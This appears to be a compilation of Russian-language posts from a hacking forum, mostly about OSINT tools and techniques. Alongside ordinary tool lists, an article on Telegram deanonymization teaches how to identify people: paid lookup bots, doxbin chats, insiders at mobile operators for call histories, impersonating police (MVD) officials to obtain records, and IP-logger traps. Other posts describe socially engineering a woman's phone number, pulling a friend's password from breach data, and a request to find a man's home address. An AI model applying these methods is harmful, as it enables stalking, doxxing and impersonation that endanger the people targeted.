Цель второй части: расширить область поиска информации и, опять же, встроить новые инструменты в ежедневную практику в качестве навыка. Т.е. не научить искать что-то конкретное, а искать всё, задействуя при этом большее количество инструментов как профии.
t.me
Всех приветствую !!!!Подскажите актуальные боты по UA.Типо глаза бога,но или другие ,в которых большие базы по UA.Спасибо
Писать ежедневные статьи об OSINT нереально,тактики и приемы в большинстве случаев одинаковы, но сами случаи бывают разные. Здесь я объясню, как я использовал OSINT, когда это было необходимо. Эта статья о том, что я думаю и что я делаю.
Лучший инструмент OSINT - это сам человек, его/её мышление. © grozdniyandy - NoOpSec
Пожалуйста, поймите, что defensive OSINT - это то, что мы делаем не для того, чтобы спрятаться, а для того, чтобы другие не злоупотребляли нашей информацией. Мы делаем это только в целях самообороны. © grozdniyandy - NoOpSec
Предварительные требования : Желательно, yметь гуглить не в гугле.
Уровень : Легкий
Spoiler: Ссылки на предыдущие части дневника
Содержание
Хотите верьте, хотите нет, но иногда люди обращаются ко мне, чтобы объяснить студентам университетов, что такое кибербезопасность. Вместо того чтобы говорить с ними о ежедневных атаках и т.д., я говорю об OSINT. Очевидно, я не рассказываю им о том, что собираюсь написать, я просто говорю с ними о штуке под названием flightradar, чтобы они могли следить за своими друзьями, которые летают за границу (просто пошутить). И не так много людей говорят об OSINT, возможно, потому, что никто не хочет раскрывать наиболее эффективные методы анализа личности. Но, так или иначе, все доступно онлайн.
OSINT - Open Source Intelligence - это процесс сбора и анализа
информации из общедоступных источников.
Reconnaissance - Разведка - это планирование и выполнение различных
операций, будь то в военной, деловой или других областях, поскольку она
помогает организациям или частным лицам собирать данные, необходимые для
эффективного принятия решений.
В чем разница между OSINT и Reconnaissance?
Разведка включает в себя широкий спектр мероприятий по сбору информации,
включая те, которые могут быть связаны с засекреченными или скрытыми методами.
Но OSINT - это специфический вид разведки, который фокусируется исключительно
на сборе и анализе общедоступной информации. Некоторые из вас могут назвать
это "фуфлом", [По словам аналитика Шермана Кента, в мирное время 80%
информации, необходимой лицам, принимающим решения, находится в открытом
доступе. Таким образом, OSINT рассматривается как первый
ресурс.](https://www.linkedin.com/pulse/osint-powerhouse-behind-threat-
intelligence-uncovering-tony-h) Для тех, кто не знает, он работал на CIA (как
и я - ШУТКА). Теперь некоторые из вас могут прокомментировать: "Это было в
эпоху динозавров". Ну, он сказал, это в эпоху динозавров, когда не было
большого количества общедоступной информации, представьте ситуацию сейчас, в
2023 году, когда каждый публикует свой авиабилет в snapchat.
С моей точки зрения
А теперь давайте подумаем об этом так, как это делаю я. Как вы знаете, иногда
я пишу отчеты о пентестировании веб-приложений. В этих отчетах также есть
pазведка. Разведка разделена на 2 части, активную и пассивную. Пассивная
разведка - это сбор информации о системе без непосредственного
вмешательства в нее, тоесть мы саму систему не трогаем. Это как разузнать о
ком то, через знакомого, не общаясь с самим типом. Система может быть
неработоспособна, мы не знаем, наша работа заключается в сборе информации,
даже не пингуя (ping) ее. При активной разведке нам разрешается
вмешиваться в работу системы (можем её потрогать). Мы можем пропинговать его,
выполнить активное сканирование и так далее. Обычно большая часть моих отчетов
включает сбор поддоменов и информации об используемых технологиях, типа
wordpress, adminer, phpmyadmin и тп.
Я уверен, что все, кто интересуется OSINT, ознакомились с книгой SANS, SEC-487, публичной версией которая утекла. Я немного просмотрел эту книгу, я согласен, что источники действительно хороши, но она старая. Мы собираемся проверить некоторые из имеющихся там ресурсов. Очевидно, что некоторые ресурсы уже есть здесь - https://xss.is/threads/26263 / - Я не могу проверить все 44 страницы, поэтому я не знаю, какие из них были опубликованы. Все, что я пишу в этом разделе, - это то, что я обычно рассказываю студентам, поскольку эта информация находится в открытом доступе. Забавный факт, некоторые из моих друзей пользуются моими презентациями.
Я могу допускать ошибки, я говорю об этом в каждой своей статье, вы вольны их исправлять.
Прежде чем продолжить, давайте разберемся, что такое информация, для этого мы должны понять, что такое "данные". Данные - это набор необработанных "значений". Представьте, что у нас есть магазин, каждый день люди приходят в наш магазин и покупают товары. Мы записываем то, что они покупают, в excel. Допустим, человек X пришел и купил 2 туфли и 1 рубашку, человек Y пришел и купил 2 flip-flop и 2 рубашки. Это и есть данные. Теперь, в конце месяца, мы объединяем все эти данные и понимаем, что в общей сложности в этом месяце было продано 100 flip-flop, 200 туфель и 50 рубашек. Когда мы объединили данные, мы фактически "обработали" и "организовали" их. Обработанные и упорядоченные данные, на основе которых вы можете принять решение, называются "информацией". Итак, мы преобразовали наши данные в информацию, и если мы захотим, мы можем создать на их основе диаграмму и принять решение.
На самом деле наиболее распространенными способами получения информации являются новости, статьи, платформы социальных сетей и поисковые системы. Возможно, вы не сможете определить чей-то возраст с помощью инструментов "OSINT", но вы можете проверить instagram этого человека, получить его электронную почту, которую этот человек опубликовал, разместив изображение экрана ноутбука, и узнать дату рождения, проанализировав эту почту.
**JustDeleteMe
Ссылка**: https://justdeleteme.xyz/
Этот веб-сайт на самом деле скорее defensive OSINT, чем offensive. Цель этого веб-сайта - сообщить нам, сможем ли мы удалить нашу учетную запись после регистрации или нет. Некоторые люди не сочтут это серьезным, для таких людей я рекомендую проверить форум, есть пользователи, которые хотят, чтобы их аккаунты были удалены, но это невозможно. Лучше ознакомиться с правилами, прежде чем где-либо регистрироваться.
Изображение [1]: JustDeleteMe
**Marinetraffic
Ссылка**: https://www.marinetraffic.com
Что такое AIS?
AIS - automatic identification system - передает местоположение корабля, чтобы
другие корабли были осведомлены о его местоположении. Этот веб-сайт позволяет
нам отслеживать суда по всему миру с помощью AIS. Можно просматривать
перемещения судов в режиме реального времени, а также получать информацию о
них. Это просто то, что нужно проверить, когда вам скучно на работе.
Изображение [2]: Marinetraffic
**DeviceInfo and WHOER
Ссылки: **https://www.deviceinfo.me
и https://whoer.net
Поразительно, как много информации веб-сайты могут получить о пользователе, просто используя javascript. Знаете ли вы, что в некоторых случаях даже возможно получить статус "Батареи" устройства, просто попросив кого-нибудь перейти по ссылке. Oдним из веб-сайтов, который демонстрирует важность браузеров с защитой от обнаружения, является deviceinfo. Какое это имеет отношение к WHOER? Ну, знаете ли вы, что вы не можете выполнять поиск в Shodan с помощью VPN, он просто заблокирует вас. Когда я хочу использовать безопасный VPN и браузер с защитой от обнаружения, я всегда проверяю себя, выполняя поиск в Shodan. Просто чтобы быть уверенным, что они оба работают так, как должны. Это связано со WHOER, просто потому, что перед входом в Shodan я проверяю свою маскировку. У WHOER классная возможность проверить ваш "User-Agent", используя 2 метода, один из которых - по заголовку, другой - через javascript. На самом деле можно подделать и то, и другое, но большинство людей просто подделывают заголовок. Как сказал один мудрый человек, "Отсутствие javascript - это не главное, это базовый уровень, по которому должны оцениваться все веб-сайты ".
**Hunter
Ссылка**: https://hunter.io
Лично я считаю, что этот веб-сайт - лучший способ получать электронные письма с определенного домена. Если вы знаете какую-либо альтернативу ЛУЧШЕ этой, пожалуйста, напишите в комментариях. Что? Если ты думаешь так же, как я, то у нас обоих на уме только одно!)
Изображение [3]: Hunter
**CheckUser
Ссылка**: https://checkuser.org
Этот веб-сайт проверяет доступные имена пользователей и домены. Все, что вам нужно сделать, это внести свой вклад. Очевидно, что такого рода веб-сайты могут работать неправильно. Их IP / прокси-серверы могут быть со временем заблокированы, или система, в которой они выполняют поиск, может получить обновление. Но все же приятно знать, что такого рода веб-сайты существуют.
Изображение [4]: CheckUser
**UnrealPerson
Ссылка**: https://www.unrealperson.com
Этот веб-сайт генерирует фотографии несуществующих людей с помощью искусственного интеллекта. Я бы очень предпочел, чтобы вы использовали его в оборонительных целях.
**SnapChat Map
Ссылка**: https://map.snapchat.com
О, снэпчат, любовь арабов (не дискриминирую, они им больше всех пользуются). Карту Snapchat можно использовать для получения информации о конкретном месте, там всегда кто-то что-то публикует. Фанаты Snapchat работают быстрее, чем новости. Я ненавижу все социальные сети, особенно эту, это безумие, как люди зависимы от нее. Я не знаю, что хуже: тот факт, что у них есть Восточный Лондон в Южной Африке, или тот факт, что люди публикуют все в snapchat.
Изображение [5]: Восточный Лондон в Южной Африке
**WikiMapia
Ссылка**: http://wikimapia.org
Викимапия - это место, где люди публикуют свои мысли о конкретном месте. Например, на картах Google вы увидите, что Претория является частью Южной Африки, но в викимапии вы можете увидеть несколько интересных комментариев.
Изображение [6]: Pretoria
Здесь не так много постов о мета-поисковых системах. Когда дело доходит до OSINT, я всегда начинаю гуглить не в гугле. Цель мета-поисковых систем - объединить информацию из других поисковых систем, таким образом у нас не будет обходимости проверять все поисковики по очереди. Забавно, что даже несмотря на то, что мета-поисковые системы существуют, нам все равно придется проверять их один за другим. Я думаю, кто-то должен создать "мета-мета поисковую систему". Всегда начинайте с выполнения OSINT на себя. Проверьте, какая информация у вас есть в открытом доступе, особенно старайтесь использовать такие дорки, как "filetype". Недавно я нашел свои резюме в Интернете.
Топ-3 мета-поисковых системы, которые действительно помогли мне:
https://www.dogpile.com/
https://metager.org/
https://www.qwant.com/
Теперь вы можете прокомментировать и спросить, почему я не использую инструменты для этого. Очевидно, что использование инструмента и автоматизации
Мы знаем, где искать, и что теперь?
Теперь у вас есть информация о себе, отредактируйте эту информацию. Попробуй
притвориться. Найдите бесполезный сайт, зарегистрируйте его, заполните
поддельные данные, кроме вашего имени и фамилии.
И это все? Это ваша защитная тактика?
Очевидно, что нет. Составьте список веб-сайтов, на которых были доступны ваши
данные, зарегистрируйтесь на этих сайтах с абсолютно поддельными данными в
качестве нового пользователя. Создайте несуществующего человека. Как я сделал
с этим аккаунтом =) Я не использую какой-либо защитный OSINT, найти меня - это
ez, но все же некоторая информация должна быть подделана. Используйте то, что
вы узнали выше, создайте поддельную фотографию профиля с unrealperson ,
зарегистрируйтесь на веб-сайтах, укажите поддельную дату рождения,
несуществующий номер и т.д. Таким образом, вы создаете несуществующий профиль
в Интернете, который будет трудно отследить.
Интересно, еще что-нибудь есть?
Чтобы вашу электронную почту нельзя было отследить, создайте поддельное
электронное письмо. Используйте protonmail и используйте случайный пароль в
качестве своего имени пользователя. Да, вы правильно прочитали. Ставьте везде
разные пароли и используйте разные электронные письма для разных целей.
Развлечение? Первое поддельное электронное письмо. Образование? Второе
поддельное электронное письмо и так далее..
Всегда обращайте внимание при создании профиля, потому что обычно сохраняется именно первый вход в систему. Используйте браузер anty-detect + vpn внутри виртуальной машины.
Итак, схема такова
Возможно, вы ожидаете, что я расскажу вам, на каких сайтах регистрироваться и размещать резюме. Если я сделаю это, все сделают то же самое, что сведет на нет весь смысл моей статьи.
Я не пользуюсь никакими социальными сетями, хотите верьте, хотите нет. Потому что у меня нет девушки. В принципе, мне не с кем общаться в социальных сетях, обычно я встречаюсь и разговариваю с людьми или мы созваниваемся. Все началось еще до того, как я пришел в службу информационной безопасности, когда я был "инста самец". На самом деле я больше интересовался telegram, чем instagram. Я уверен, что все мы использовали ботов для поиска знакомств и были активны в игровых группах, например для UNO. Итак, однажды я решил поболтать с девушкой, которая мне понравилась, но я понятия не имел, настоящая она или нет, в Интернете этого никогда не узнаешь. Поэтому я использовал этот трюк (это было для самозащиты, чтобы избежать общения с каким-нибудь сумасшедшим человеком). Я добавил ее в свои контакты в telegram, не делясь своими контактами (для этого есть кнопка), и назвал ее "Лоис Лейн", которая на самом деле является девушкой супермена. Я отправил ей скриншот и написал: "Я добавил тебя в контакты, как те?. Как бы ты меня назвалa?" Очевидно, она добавила меня в свой список контактов и слила свой номер. К тому времени я уже знал о "Глазе бога" и использовал его, чтобы получить всю необходимую мне информацию. В те времена их telegram-бот не заставлял иметь российский номер или делиться номером.
Ну и что, это твоя крутая история?
Нет, это был всего лишь простой пример OSINT. Ресурсы OSINT не советуют вам
использовать социальную инженерию для получения номера телефона. Я думаю, мы
можем назвать это активной разведкой. Но, как бы то ни было, игра началась,
когда один из моих друзей попросил меня найти доступную информацию о нем и дал
мне свой электронный адрес. Итак, электронная почта выглядит следующим образом
xss@email.com , я использовал "xss" в качестве имени
пользователя. Первое, что я сделал, это проверил "HaveIBeenPwned", я сделал
это и получил только одну утечку. Я скачал это и получил его пароль. Я понятия
не имел, что делать дальше, поэтому решил зарегистрироваться на snusbase и
intelx. Snusbase выпустила новую бета-версию, которая позволяет выполнять
поиск по именам пользователей с использованием подстановочных знаков. Это
помогло мне найти его имя пользователя следующим образом "xss%", я получил все
имена пользователей, которые могут принадлежать ему. И знаешь что? Он
использовал те же пароли, так что я уже знал, какие данные настоящие, а какие
нет.
После этого я использовал мета-поисковые системы, чтобы получить информацию о том, где он зарегистрирован, просто выполнив поиск по его именам пользователей. Я нашел интересные сайты, некоторые из которых были социальными сетями, несколько простых сайтов знакомств. Мой очень умный друг умудрился слить свой номер, лол.
Давайте возьмем образец несуществующего электронного письма и выполним поиск по нему. Я предпочитаю использовать "test@gmail.com". Я не знаю почему, но этот gmail зарегистрирован буквально везде. К сожалению, на данный момент у меня нет подписки на snusbase, но мы можем использовать поисковые системы!
Цель : test@gmail.com
Первое, что мы должны сделать, - это использовать метапоисковые системы. Чтобы избежать получения большого количества информации, я использовал "filetype: pdf" и "filetype: xml". Вы можете использовать какие-нибудь другие интересные придурки. Пожалуйста, поймите, что доркинг может не работать в большинстве мета-поисковых систем. Поэтому я тоже поискал в Google. Как я уже говорил ранее, мета-поисковые системы нестабильны, всегда полезно проверить и обычные поисковые системы.
Изображение [7]: Один из результатов поиска.
P.S. Мы не делали ничего противозаконного, я - белая шляпа. Это просто один из результатов поиска. Извините, что мне пришлось удалить большую часть этого.
Изображение [8]: Гуглим
Очевидно, что обычно у нас меньше информации, это всего лишь тест. Итак, давайте проверим haveibeenpwned.
Изображение [9]: HaveIbeenPwned
Кстати, проблема, с которой я столкнулся при OSINT, заключается в том, что я получаю много данных. Единственный способ решить эту проблему - создать таблицы с доступными данными в порядке от наиболее возможного к наименее возможному.
Итог : не ставьте такую цель)
А если серъёзно, то при проверке в реале, последовательность такова:
Я рассказал вам о своем случае, очевидно, возможно несколько случаев, в которых используются конкретные домены, где мы будем использовать hunter и т.д.
Я помню, в одном из постов, которые я читал, говорилось о сборе информации о компании, прежде чем устраиваться на работу. Прежде всего, давайте поймем, что объявления о вакансиях раскрывают слабые стороны компаний. Если кто-то ищет старшего инженера по безопасности, это может означать, что у этой компании возникла проблема в отделе информационной безопасности. Очевидно, что мы не можем сказать это просто из-за объявления о приеме на работу, но это возможно. Ну и что? Следите за LinkedIn и сайтами по размещению вакансий.
Во-вторых, один из моих любимых веб-сайтов - это https://www.similarweb.com
- этот веб-сайт предоставляет информацию о веб-сайтах, он содержит
географическое местоположение посещающих его пользователей, категории, похожие
однотипные сайты, другие посещаемые сайты и конкурентов.
Третья и на самом деле сногсшибательная часть - это проверка сотрудников компаний с их страницы в LinkedIn / Habr Freelance и тп. Позвольте мне объяснить это с нуля. Например, существует сертификация под названием CRTO, эта сертификация касается active directory и cobalt strike. Зачем кому-то получать этот сертификат, если у компании под рукой не имеется cobalt strike? Это означает, что компания пользуется этим. Это всего лишь пример, то же самое можно сказать и о сертификациях облачной безопасности. Сотрудники могут иметь специальные сертификаты Google Cloud Security, которые указывают на технологию, используемую компанией. Для большинства из вас это может звучать как нечто обычное, но на самом деле получение такой информации может привести к критическим результатам. Если это вас не удивило, представьте себе работников компании, имеющих сертификаты fortinet. Разве это не означает, что компания использует fortinet? Не означает ли это, что они просто дают злоумышленникам подсказки об используемых технологиях? Не знаю как вам, но у меня мурашки по коже когда думаю об этом
Оставайтесь в безопасности, будьте в белой зоне и всегда думайте о своей безопасности!
С уважением grozdniyandy
Специально для xss.is
Здравствуйте милые дамы и уважаемые господа.
Сегодня я хочу разобрать для вас тему "Osint по телеграм"
Осинт прежде всего это ваша грамотность в подходе к человеку (СИ) или ваше
умение искать и терпеть неудачи.
Вы должны улавливать любую деталь из ваших переписок или поиска информации.
Приступим.
Глава первая.
Первым делом обращаем внимание на Имя и Фамилию пользователя, возможно там
будут указанны его реальные данные. Затем смотрим на юзер (username)
пользователя, возможно там тоже будут детали по типу 08121993 или
имени/фамилии/ника, эти детали в дальнейшем возможно помогут нам.
Анализируем аватарки пользователя. Допустим мы видим на аватарке лицо(фейк или
не фейк) нашей цели, по лицу можно примерно определить возраст человека.
Прикидываем что юзеру 24 года и если у нас есть голосовые сообщения, то
примерно так же сравниваем их с лицом. Объясню проще, юзеру на вид 24 года, но
у него детский голос, так что скорее всего мы убираем из нашей головы
информацию о лице цели. Так же советую обращать внимание на мельчайшие детали
лица и голоса, например голос прокуренный или больной, это всё может
отображаться на лице (бледность, усталый взгляд, сыпь и т.п.). Разрабатывайте
свое мышление и используйте свои методы СИ для деанонимизации личности.
Глава вторая.
Деанонимизация по номеру телефона. Если номер телефона закрыт, то
воспользуйтесь банально ботами по типу глаза бога(если номер скрыт в ГБ,
воспользуйтесь UserBox). Все эти боты скорее всего будут платными, поэтому
найдите в чате доксбина людей который готовы за спасибо пробить вам бесплатно.
Если ни один бот не показал вам никакой информации о номере: ищите номер в
слитых базах данных телеграма. И так, номер у нас. Что стоит сделать дальше?
Ответ прост. Проверьте данный номер hlr-запросом он покажет вам: виртуальный
ли номер или оформлен на физ. лицо. О том как понять какой номер к какому типу
относится(вирт/физ) есть информация в интернете. Если номер физический, то вам
нужны знакомые в компании оператора мобильной связи. Знакомый нужен для того,
что бы он мог сделать детализацию местоположения номера или историю звонков.
Так же посмотрите этот номер в Getcontact, он покажет как записан у других
людей этот номер телефона. Пробейте этот номер в базах и тг ботах на утечки.
Если номер виртуальный, то дела обстоят чутка хуже. Постарайтесь определить
какой сервис по продаже виртуальных номеров предоставил его. Если вы не смогли
определить сервис, то вам нужно отправить запрос якобы от лица сотрудника МВД
на почту всем или популярным сервисам о запросе логов о покупателе этого
номера.
Глава третья.
Рассмотрим способ деанонимизации цели по EXIF, IPTC и XMP метаданным. Эти
данные вы можете получить от пользователя если он отошлет вам фотку сделанную
с телефона и отправленную БЕЗ сжатия в телеграме. Качаем эту фотографию себе
на пк > щелкаем по ней пкм > свойства > подробнее. Там будет вся информация о
фотографии. Так же можете воспользоваться сервисами которые по фото раскроют в
удобном формате вам метаданные
Глава четвертая.
Айпи логгер. IP logger - утилита позволяющая вам создать ссылку которая при
переходе цели по ней, сохраняет его IP. Как замаскировать IP логгер вы можете
так же почитать в интернете. IP простыми словами - это цифры которые
идентифицируют ваше устройство в сети. Чаще всего именно по айпи находят
людей, ведь вся информация о посещениях в интернете привязанна к вашему айпи
на разных сайтах, например вы зашли под очень хорошей цепочкой анонимности
(вас не могут найти службы), вы работаете по черным темам, но вы допускаете
максимально глупую ошибку связывая личную информацию о вас (например аккаунт
вк) с айпи который был задействован в черных делах за которые вас ищут.
Примерно по такому же принципу и находят людей осинтеры. После того как
посадили цель на логгер и узнали его айпи, ищем его остаточные пакеты
связанные с этим айпи.
На этом моя статься об Осинте по телеграм подходит к концу, но я хочу вам дать
свою фишку с помощью которой я иногда находил нужных мне людей. Ваша задача -
завести цель на аккаунт телеграм к которому у вас есть доступ. После того как
цель зашла на такой аккаунт, её айпи сохранился в логах. Теперь переходим к
настройкам > продвинутые настройки > экспорт данных из Telegram. Экспортируем
данные и смотрим айпи которые были на аккаунте. Отсекаем свой айпи и вот уже и
наша цель.
Данная статья не описывает все возможности деанонимизации пользователя телеграм, но описывает самые действенные способы.
Спасибо за прочтение моей статьи, скоро я выложу ссылки на сервисы которые помогут в осинте по телеграму. Всем добра!
I found this on the web, Here's an amazing collection of personal links. I call it all in one
You must have at least 3 reaction(s) to view the content.
Добрый день форумчани есть база которая состоит из id Телеграм,есть ли боты или сервисы(конечно жедательно бесплатные) которые по Id выдадут юзернеймы @ пользователей(соответсветнно при их наличии)
EXIF — стандарт, позволяющий добавлять к изображениям и прочим медиафайлам дополнительную информацию, комментирующую этот файл, описывающий условия и способы его получения.
Для файла формата изображение.
http://metapicz.com/#landing — покажет EXIF;
https://www.stolencamerafinder.com/ — определит EXIF и по этим данным найдет
какие еще фото были сделаны этим устройством;
http://exif.regex.info/exif.cgi — извлекает метаданные;
www.get-metadata.com — извлекает метаданные;
https://29a.ch/photo-forensics/#level-sweep — фото-форензика, анализ
изображения на изменения;
https://stylesuxx.github.io/steganography/ — декодирует скрытое сообщение в
изображении;
https://github.com/beurtschipper/Depix — депикселизирует текст на картинке;
www.focusmagic.com — восстановит детали и
резкость размытых фотографий;
Инструменты
https://draftable.com/compare — сравнивает 2 документа показывает разницу;
Для файла формата DS_STORE.
https://intelx.io/tools?tab=filetool — узнайте имена файлов скрытые в файле;
Для файла формата HAR.
https://stevesie.com/har-file-web-scraper — покажет содержимое файла в
удобном виде;
https://toolbox.googleapps.com/apps/har_analyzer/ — покажет содержимое файла
в удобном виде;
http://www.toolsley.com — определяет тип файла;
Расширения для браузера
![addons.mozilla.org](/proxy.php?image=https%3A%2F%2Faddons.mozilla.org%2Fuser- media%2Fpreviews%2Ffull%2F192%2F192605.png%3Fmodified%3D1622132519&hash=74bd2b12321079ee9bf1410405d72365&return_error=1)
](https://addons.mozilla.org/en-US/firefox/addon/exif-viewer/)
Download Exif Viewer for Firefox. Displays the Exif and IPTC data in local and remote JPEG images.
addons.mozilla.org
![chrome.google.com](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2F0CfyR8sU9xhQ1M_LdCH_N9dvaDbyXXMfjHwvrCRfu8gQ7E18aQ2KrB- qYm6kYUMC2eDQW9w9-PLqsgn8atVabT42Zg%3Ds128-rj- sc0x00ffffff&hash=d82738e62d5d4001daa40e8b6ca110aa&return_error=1)
](https://chrome.google.com/webstore/detail/exif-viewer- pro/mmbhfeiddhndihdjeganjggkmjapkffm)
Quick access to EXIF data of any image you view
chrome.google.com
привет, ребята, этот список потрясающий, я хочу поделиться им с вами
Omnisci3nt - это мощный инструмент для распознавания веб-страниц, предназначенный для разгадки скрытых сложностей онлайн-сферы. Обладая широким спектром возможностей, Omnisci3nt предоставляет пользователям средства для изучения различных аспектов целевого домена, включая поиск IP-адреса, информацию о домене, данные о сертификате SSL, перечисление DNS, перечисление поддоменов, сканирование портов, веб-ползание, анализ используемых технологий, сканирование Wayback Machine, изучение записей DMARC, обнаружение ссылок на социальные сети и многое другое.
Ключевые особенности:
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F469bff2e3c883471a6ff550cd1b1cb1831a7a8334c256ac10fc96c3eab6c0343%2Fspyboy- productions%2Fomnisci3nt&hash=96ed7da7919ca59d6caea88bbab9ecc7&return_error=1)
the Web – A Comprehensive Web Reconnaissance Tool ](https://github.com/spyboy- productions/omnisci3nt)
Unveiling the Hidden Layers of the Web – A Comprehensive Web Reconnaissance Tool - spyboy-productions/omnisci3nt
github.com
Milhares de links para usar OSINT
я осинтер с большим стажем посоветуйте форумы желательно с разделом "osint" или же телеграмм каналы
Is there an OSINT search engine that provides median income of areas/districts in US? Personal or business incomes?
I have created some dorks that are useful for me to spot phishing pages on url scan.io. Like if you like it Also, keep posting your dorks for urlscan[:]io,censys, shodan etc.and continue this thread
abc denotes the domain name
http://https[:]//urlscan.io/search/#abc*
page.domain[:]/.abc./ AND NOT abc.com AND NOT
www.abc.com AND NOT *.abc.com)
page.domain[:]/.xyzbank./ AND NOT xyzbank.in AND NOT
www.xyzbank.in AND NOT *.xyzbank.in)
page.domain[:]/.pqrbank./ AND NOT pqrbank.com AND NOT
www.pqrbank.com AND NOT *.pqrbank.com AND NOT
*.pqrprivatebanking.com)
page.domain[:]/.lmnopfin./ AND NOT lmnopfin.in AND NOT
www.lmnopfin.in AND NOT *.lmnopfin.in AND NOT
*.lmnopfinmarkets.in)
page.domain[:]/.qrst./ AND NOT qrst.com AND NOT
www.qrst.com AND NOT *.qrst.com AND NOT *.qrst.net AND
NOT .qrs.com AND NOT .qrst.io)
domain:qrst.com AND NOT page.domain:qrst.com
qrst.web.app
page.domain[:]/qrstinsurance./ AND NOT qrst.com)
page.domain[:]/.postservice./ AND NOT postservice.com AND NOT
www.postservice.com AND NOT *.postservice.com )
Cheers
+380986567511 сам вирт
Ищу OSINT-специалиста. Нужно пробить парня, узнать его фактический домашний адрес. Мне известен его Instagram, город, район, имя и возраст, а также некоторые увлечения. Есть его фото, видео, предположительно снятое возле его дома и другая информация. Через гаранта.
Всем привет, есть у кого какой способ чтоб по номерам телефонов пробивать
юзеров штаты и юк, чтоб норм так данных было, почты, фио и тд, базы общие гуд,
но редко там все встречаются, типо глаза бога, только не для снг есть ?
Буду рад почти любому ответу.
Чаты :
@osint_group
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FtZTVpxCqEkhTaVRxAahZtBRSPc3pKa4psdK8uki0lp-5DtfLJO7PVEuxjFoGWGYOJJGoMO3FVPU8gIXRfGYE7l4rrwUP- xzwhBQCJh3ao-fWhTsl3awC66ID1g51mLg9FFagHf_STzA1Hxy6dRf2T9oIdcHAIO- FzUVDYLIKeKi2uVxCMKHtNn- FZBcx26M8HDwbGdV3PCKSA4vFZehhSaqIWXbevuXr6Z49Wcm12OucHXVBRRBJ9wzR6OHP4kHK0nVbY_OKG_YSRUhQwX8ZWVAom90KtPHqBdi7A2DUVJ8IuZPthYxs2IBuYJ1KGcWgEbleRJ0Ahcpt4Nq3Rbx7_g.jpg&hash=1df37780f321c5c6a7bfbc4b932eb6d0&return_error=1)
About OSINT and investigation Channels: 🇬🇧 @HowToFind 🇷🇺 @HowToFind_RU Bots: 🇬🇧 @HowToFindBot 🇷🇺 @HowToFindRU_Bot
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.telegram- cdn.org%2Ffile%2FulAzWCeXJ_az6hsNo98Ud5Eu__k8e0qGf7S6fY9PRCFtiYvThgqiIQHuDPdy0JL9w3ASMpTz9bd7Vav9BY7pHmqucM5ugoXLyi7EH2_rRqfz2a5jR8YH8Lp9AkY0S9BQJ3zbmjumeAy1UYRagB0nMBCJLv7Ub7T80DLpVKt8nTknvcGhQHwg- wyjrI4NsDYmAWrbkoXnifw58A7bz309Ibzg2Iqfta4nQ0iWicBxVTcyalub_aHdvuTMJ9V1IQycPAT0p2aQC0xZ0KZm61Y95STuMwyABwiK2F1KFIkqmb7xYOsbyIcuWNIWnWnl- ZhMtxnbf_w1wnYurKoeZXmuAg.jpg&hash=c0986ce889cfa1e34ba27c7ac823dd8a&return_error=1)
Come for the challenges, stay for the tips. Find our fake Richard Stallman's location, pet, religion, education, etc. based on his social media accounts. Username is required. No tolerance for illegal content, NO DOXXING.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FP8qSvJx05UKXQplzUv3e32ackmuLxj8eD6B1VHIk4q7p2RGYt6EQ7nWrtXyojK0gRIdNpXEGzBUTCHSJogIVCD_PYTWcUqdOqwqFgBRuwn7Xs84l3uEgPK3o9q_cwY6iRgTF5kAXE- RdkiUMYh9jdXZt3DuIMhXZSKW4ZX3cjvkvGj2c89nY9rK4ku5dnd7kiZWYX0XA7UUZIunGXzSJp1XPS_aQwLmEtsZLvwURWSq29OnkzxTkol_zTy7dHdH3s_iDG8A8DgL0nOkBCetC0gzc6i-eAhj_imdCcrNyupxtlV39rSaYV-O1_CnrAmUBLfjBiinUonR1O0h4NOk4PQ.jpg&hash=dd62d1a56bab88a854d8e425d32d40ae&return_error=1)
You can view and join @DigitalScoutingChat right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FAciDFBhncSQnDghvVMiupF8WsDJezkp7p_Iklh8oIu5N3kwbEXc3AXDYlRtUJ8Lz8xHCglZh9eda0FCxx9DUU7WD2CERRHOSaUDhlV3caMHOfoXmF1imjMsvIV5cwO4TTDkychWmthpQO6U9s50XXiHcfzgylag- ywkGeFMXgx6nOZbCGRlPslqqpUHJj_qw13Dr6xVFG64Gej_g0o9Z4TBuKV9QaYtsqwEeNGdEgNAkXa- LuEQJixIfJDhWx_GO4bVT6JfIjIdyVWJzypbASgeNZYcNoUqIeVg_oc- kZywidE20ymFMRyGO9KT6XesKnvp_G8YWLZOF1Iec7vGP_g.jpg&hash=d7e6bccc86812219ee529a987c4321a5&return_error=1)
You can view and join @osint_id right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.telegram- cdn.org%2Ffile%2FfcQ95-L95BtNbDreh_LNYXJEEqaflKIdK34dyuWT2SEGH6YilG1CVsuY6TXppXIxvEmnyaJ3PwkygCFNYreEEbnKBGrHwUwUaEokioa2c9sBUkjn0BveKuL- mrFV7VTmNG_C35jN0H-nvc6W3bICKWlxbkM7xUevHUno1rLPnrZbF34EdVoVAx9JVdJRU7opm1aR_NvbY6xlnnlTKj0yUIRUGzHZA1S55AFAseMNCxZDZfshqeCAwzmgKlIx1duZoZfE_dfAXsANC- ls066MqtZ6Px0ZAcqrFzJ6Jlr6O_4jW8jFg5JAbBB8wmoXs6kC6OaA_LCNvynM1MVrDWlOTA.jpg&hash=1e541a5da5378c8906c5069ca67845de&return_error=1)
Grupo sobre OSINT e outras fontes de inteligência (GEOINT, HUMINT, IMINT etc.). "Toda informação deve ser livre". @osint_channel
t.me
